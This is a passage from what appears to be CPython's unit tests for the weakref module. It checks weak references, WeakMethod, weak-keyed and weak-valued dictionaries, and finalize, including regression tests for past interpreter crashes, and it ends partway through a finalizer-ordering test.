# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
self.assertFalse(a == x)
self.assertTrue(a != x)
self.assertTrue(a == ALWAYS_EQ)
self.assertFalse(a != ALWAYS_EQ)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
# - retain their hash is they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
# Compare with different types
_ne(a, x.some_method)
_eq(a, ALWAYS_EQ)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
# Since underlaying dict is ordered, first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
with self.assertRaises(TypeError):
weakref.finalize(a, func=fin, arg=1)
with self.assertRaises(TypeError):
weakref.finalize(obj=a, func=fin, arg=1)
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
